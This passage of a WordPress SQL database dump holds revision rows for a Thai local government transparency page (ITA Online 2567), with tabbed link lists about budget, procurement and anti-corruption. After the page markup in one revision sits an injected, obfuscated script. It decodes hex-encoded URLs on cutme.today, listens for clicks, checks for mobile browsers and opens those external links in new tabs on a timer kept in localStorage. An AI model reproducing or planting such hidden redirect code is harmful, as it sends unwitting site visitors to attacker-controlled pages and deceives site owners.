wp:kadence/listitem {\"uniqueID\":\"871_eb0ffb-85\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_eb0ffb-85\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=703\" data-type=\"page\" data-id=\"703\">รายงานผลการดำเนินงานประจำปี</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_da22bc-41\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_da22bc-41\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\" data-type=\"page\" data-id=\"784\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_df06d7-11\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_df06d7-11\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=771\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_006068-f2\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_006068-f2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=776\" data-type=\"page\" data-id=\"776\">ข้อมูลเชิงสถิติการให้บริการ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_b2d0c3-79\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_b2d0c3-79\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"_bcc767-12\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab_bcc767-12\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":4,\"uniqueID\":\"_e603b6-8d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-4 kt-inner-tab_e603b6-8d\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":5,\"uniqueID\":\"_ff999a-98\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-5 kt-inner-tab_ff999a-98\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_25468b-f6\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_25468b-f6 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_ae038f-10\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_ae038f-10\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_667e50-fd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_667e50-fd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_22db24-50\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_22db24-50\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=680\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_39740e-99\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_39740e-99\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=708\" data-type=\"page\" data-id=\"708\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":6,\"uniqueID\":\"_387c35-4e\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-6 kt-inner-tab_387c35-4e\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":7,\"uniqueID\":\"_ea5a2e-14\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-7 kt-inner-tab_ea5a2e-14\"><div class=\"kt-tab-inner-content-inner\"></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n<!-- /wp:generateblocks/container -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ITA ONLINE 2567','','inherit','closed','closed','','871-revision-v1','','','2024-08-20 09:11:06','2024-08-20 02:11:06','',871,'http://pakhaeng.ssk.in.th/?p=893',0,'revision','',0),
(894,1,'2024-08-20 11:23:02','2024-08-20 04:23:02','<!-- wp:generateblocks/image {\"uniqueId\":\"285d6904\",\"mediaId\":892,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-285d6904\"><img class=\"gb-image gb-image-285d6904\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post-2.png\" alt=\"\" title=\"Is It a Gift Instagram Post\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f5e8d6af\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:kadence/tabs {\"uniqueID\":\"871_e416be-74\",\"tabCount\":7,\"layout\":\"vtabs\",\"contentBgColor\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"contentBorderStyles\":[{\"top\":[\"#0a6689\",\"\",3],\"right\":[\"#0a6689\",\"\",0],\"bottom\":[\"#0a6689\",\"\",0],\"left\":[\"#0a6689\",\"\",0],\"unit\":\"px\"}],\"titles\":[{\"text\":\"ข้อมูลพื้นฐาน\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารงานและการใช้จ่ายงบประมาณ\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการจัดซื้อจัดจ้าง\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"\\u003cstrong\\u003eการบริหารและพัฒนาทรัพยากรบุคคล\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"},{\"text\":\"\\u003cstrong\\u003eการส่งเสริมคุณธรรมและความโปร่งใส\\u003c/strong\\u003e\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\"}],\"iSize\":16,\"titleColor\":\"#000000\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#8ed1fc\",\"titleBgActive\":\"#0693e3\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderActive\":\"var(\\u002d\\u002dglobal-palette7, #eeeeee)\",\"titleBorderWidth\":[0,0,0,0],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,0,0],\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"fontWeight\":\"bold\",\"verticalTabWidth\":[38,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id871_e416be-74 kt-tabs-has-7-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ข้อมูลพื้นฐาน</span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\"><strong>การจัดซื้อจัดจ้าง</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-4 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"4\" class=\"kt-tab-title kt-tab-title-4 \"><span class=\"kt-title-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-5 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"5\" class=\"kt-tab-title kt-tab-title-5 \"><span class=\"kt-title-text\"><strong>การส่งเสริมความโปร่งใส</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-6 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"6\" class=\"kt-tab-title kt-tab-title-6 \"><span class=\"kt-title-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span></a></li><li id=\"tab-strongstrong\" class=\"kt-title-item kt-title-item-7 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-strongstrong\" data-tab=\"7\" class=\"kt-tab-title kt-tab-title-7 \"><span class=\"kt-title-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_a471bf-67\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_a471bf-67\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:kadence/iconlist {\"uniqueID\":\"871_f98827-df\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items871_f98827-df kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"871_d803ff-d2\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_d803ff-d2\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">โครงสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_921bc2-5c\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_921bc2-5c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_cba98e-ee\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_cba98e-ee\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\">อำนาจหน้าที่</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_77fcfe-f3\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_77fcfe-f3\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_e9af1d-e0\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_e9af1d-e0\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\">ข่าวประชาสัมพันธ์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"871_1087e8-9a\",\"color\":\"#0693e3\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-871_1087e8-9a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\">Q&amp;A</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_a3f15d-d7\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 